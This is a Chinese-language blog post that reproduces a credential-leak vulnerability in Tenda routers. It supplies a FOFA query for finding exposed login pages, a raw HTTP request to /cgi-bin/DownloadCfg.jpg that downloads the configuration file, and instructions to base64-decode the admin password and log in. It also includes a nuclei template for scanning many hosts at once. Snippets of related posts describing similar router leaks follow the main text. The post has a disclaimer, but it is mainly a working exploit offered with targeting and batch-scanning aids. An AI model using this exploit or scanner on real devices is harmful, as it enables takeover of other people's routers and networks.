漏洞复现--Tenda路由器DownloadCfg信息泄露

最新推荐文章于 2024-09-27 13:01:10 发布
最新推荐文章于 2024-09-27 13:01:10 发布
阅读量810 收藏 10
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134730593
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。该产品存在信息泄露漏洞,攻击者可获得路由器后台账号密码。

二:漏洞影响版本

Tenda-路由器

三:网络空间测绘查询

fofa:
title="Tenda | LOGIN"
image.png

四:漏洞复现

image.png
POC:

GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image.png
密码base64解码
image.png
成功登录

五:批量验证

id: Tenda-router-information-leaked

info:
  name: Tenda-router-information-leaked
  author: 芝士土拨鼠
  severity: medium
  description: Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。该产品存在信息泄露漏洞,攻击者可获得路由器后台账号密码。

requests:
  - raw:
      - |+
        GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - sys
      - type: status
        status:
          - 200

image.png
十中九

芝士土包鼠
关注
专栏目录
漏洞复现Tenda路由器存在密码泄露
失心少年
09-09 955
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。腾达W15E路由器外置4根增强型360°全向天线,苛刻调校到0.01毫米级的零干扰间距,科学独立布局的信号放大器PA,穿墙性能更强劲,覆盖范围更广,在哪都有好信号。1.执行密码泄露的POC,泄露密码在当前文件的sys.userpass=位置,然后base64解码即可使用该明文密码登录路由器后台。
ASUS华硕RT-N12LX无线路由器固件v2.0.0.26版
08-02
ASUS华硕RT-N12LX无线路由器固件2.0.0.26版(2014年01月02日发布)新涌出来的小米、果壳、百度、360也加入了路由器领域的厮杀,而老牌的路由器厂商除了TP-Link、D-Link、腾达等,还有华硕。 日前华硕官网更新了其RT-...
漏洞复现信息漏洞
zkaqlaoniao的博客
12-04 183
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。4、从配置中查找账户密码(直接打开JPG就行了)
漏洞复现】中国移动 禹路由-信息泄露-ExportSettings.sh
知黑而守白
07-10 77
中移禹路由器是一款性能强大且功能丰富的无线路由器。它采用了最新的Wi-Fi 6技术,提供更快的速度和更稳定的连接。它支持双频段同时工作,2.4GHz和5GHz频段可同时提供高速的无线网络,满足多设备同时连接的需求。中移禹路由器还具备MU-MIMO技术,可以同时处理多个设备的数据传输,提供更快的速度和更稳定的连接。中移铁通禹路由器ExportSettings接口处存在信息泄露漏洞,恶意攻击者可能会利用此漏洞获取到登陆账户和密码,从而登录后台,使服务器处于不安全的状态。
漏洞复现-Tenda 路由器
zkaqlaoniao的博客
12-05 409
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。4、从配置中查找账户密码(直接打开JPG就行了)免费领取安全学习资料包!帮助你在面试中脱颖而出。
TendaT路由器信息泄露漏洞(含批量验证poc)
weixin_43567873的博客
04-17 103
TendaT路由器信息泄露漏洞(含批量验证poc)
复现Tenda信息泄露漏洞_19
fushuang333的博客
01-15 1567
复现Tenda信息泄露漏洞Tenda远端WEB管理是为了在外网(其他网络)可以访问路由器,从而进行管理。
Tenda路由器 信息泄露漏洞复现
12-11 776
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
Tenda腾达部分路由器固件下载(.bin文件)
08-10
"Tenda腾达部分路由器固件下载"的标题表明这是一个提供腾达路由器固件更新的资源集合。这些固件通常以.bin文件格式提供,这是许多嵌入式系统常用的二进制文件格式,包含可直接加载到路由器内存中的机器指令和配置...
Tenda腾达路由器5G信号在哪里? 腾达路由器关闭5G信号的方法
10-01
【腾达路由器5G信号与关闭方法】 腾达路由器提供了两种不同频段的无线信号,分别是2.4G和5G。2.4G频段的无线信号具有更广泛的覆盖范围,但可能受到更多干扰,适合对网络速度要求不高的设备使用。而5G频段的无线信号...
腾达路由器怎么设置-腾达路由器设置图文教程.docx
09-27
### 腾达路由器设置详解 #### 一、前言 随着互联网的普及和技术的发展,无线路由器已经成为家庭和办公环境中不可或缺的一部分。对于初次购买腾达(Tenda路由器的用户来说,了解如何正确地进行设置至关重要。本文...
腾达路由器怎么恢复出厂设置?2种使Tenda路由器恢复出厂设置的方法介绍
10-01
【腾达路由器恢复出厂设置详解】 在日常使用腾达(Tenda路由器的过程中,有时由于配置错误或系统异常,可能需要将路由器恢复到出厂设置,以便清除所有个性化配置并重新开始设置。本文将详细介绍两种简单易行的...
【从零复现CVE漏洞Tenda 路由器栈溢出复现(CVE-2018-18708)
m0_55368674的博客
02-09 2665
Tenda 路由器栈溢出复现(CVE-2018-18708)
Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
weixin_68647219的博客
07-31 3607
简介:腾达W15E路由器外置4根5dBi高增益无线天线,同时还内置独立PA和LNA模块,大大增强无线信号的发射和接收能力,可以覆盖300平米的空间,走到哪里都不用担心信号问题。腾达W15E路由器系统存在密码泄露漏洞,攻击者通过漏洞可以获取应用后台权限。/cgi-bin/DownloadCfg/RouterCfm.cfg,可以获得RouterCfm.cfg文件。执行poc,泄露密码在sys.userpass=位置,base64解码即可登录。2.漏洞URL:http://www.xxx.com。
漏洞复现】H3C Web网管登录任意文件读取漏洞
晚风不及你
02-18 2813
H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
weixin_43567873的博客
04-05 1257
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 733
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
我用一个例子疏通“路由器漏洞&复现”【建议收藏!!】
kali_Ma的博客
07-04 840
一、介绍 ​ 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 ​ “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” ​ Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞漏洞排名中位居前25。 IOS .
部标主动安全(ADAS+DMS)对接说明
最新发布
谁念西风独自凉
09-27 642
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值